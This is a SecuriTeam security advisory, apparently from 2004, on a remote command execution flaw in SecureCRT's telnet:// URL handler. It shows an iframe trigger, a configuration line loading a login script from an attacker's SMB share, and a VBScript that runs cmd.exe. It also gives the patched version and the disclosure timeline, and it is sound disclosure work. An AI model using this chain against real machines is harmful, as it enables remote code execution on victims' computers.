SecuriTeam - SecureCRT Remote Command Execution

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

"SecureCRT is an extremely customizable terminal emulator for Internet and intranet use with support for Secure Shell (SSH1 and SSH2) as well as Telnet and rlogin protocols". Unsafe handling of a URL handler (telnet://) in SecureCRT allows a remote attacker to run arbitrary code on the target machine.

Credit:
The information has been provided by Brett Moore.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* SecureCRT Version 4.1 and 4.0 (and probably lower)

Immune Systems:
* SecureCRT version 4.1.9

SecureCRT installs a URL PROTOCOL handler into the registry, as "C:\Program Files\SecureCRT\SecureCRT.EXE" %1

This allows a user to click on a telnet:// link and have it opened from within their web browser. This 'telnet execution' can be automated through an HTML page such as <iframe src="telnet://192.168.0.1:25">

SecureCRT will accept a command line option (/F) to specify the directory to use as the configuration folder. It is possible by crafting a special URL to specify this directory through the HTML page. An attacker can specify a directory accessible through unprotected SMB share, therefore allowing them to control the configuration of SecureCRT.

Exploitation:
SecureCRT allows for 'scripting' using script languages such as VBScript and has the ability to create a logon script. An attacker can therefore create a script to execute commands and have these commands executed on the targets computer.

There appears to be some filtering around the use of \ in the URL->command line parsing, that appeared to prevent the specification of an SMB share to use for the configuration. This can be easily bypassed and leads to the loading of a configuration file from a remote site.

The configuration file contains an entry that specifies the login script to run which can be set a file on the the remote share;
S:"Script Filename"=\\ipofshare\share\folder\scriptname
And the login script can then contain scripting such as:

# $language = "VBScript"
# $interface = "1.0"

Sub Main
  dim wshShell, boolErr, strErrDesc
  Set wshShell = CreateObject("WScript.Shell")
  run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub

Disclosure Timeline:
* August 24, 2004: Discovered and advised to vandyke.com by Brett Moore of Security-Assessment.com
* October 26, 2004: SecureCRT version 4.1.9 released
* November 23, 2004: Public disclosure

	Microsoft Indeo Codec Memory Corruption Vulnerability
	HP DDMI Execution of Arbitrary Code
	Microsoft Windows License Logging Service Heap Corruption Vulnerability
	Microsoft Office Excel Code Execution Vulnerabilities
	Microsoft SharePoint 2007 ASP.NET Source Code Disclosure
	Microsoft Windows Local Security Authority Integer Overflow Vulnerability
	Windows Kernel Multiple Vulnerabilities
	Microsoft Windows ActiveX Indexing Service Memory Corruption Vulnerability
	Microsoft IIS FTP Service Code Execution and DoS Vulnerability
	Microsoft GDI+ Multiple Vulnerabilities
	Microsoft .NET Common Language Runtime Multiple Vulnereabilities
	Microsoft Active Template Library ActiveX Controls Multiple Vulnerabilities
	ActiveX Active Template Library Initialization Vulnerability
	Internet Explorer Multiple Remote Code Execution Vulnerabilities
	Windows Media Player ASF File Remote Code Execution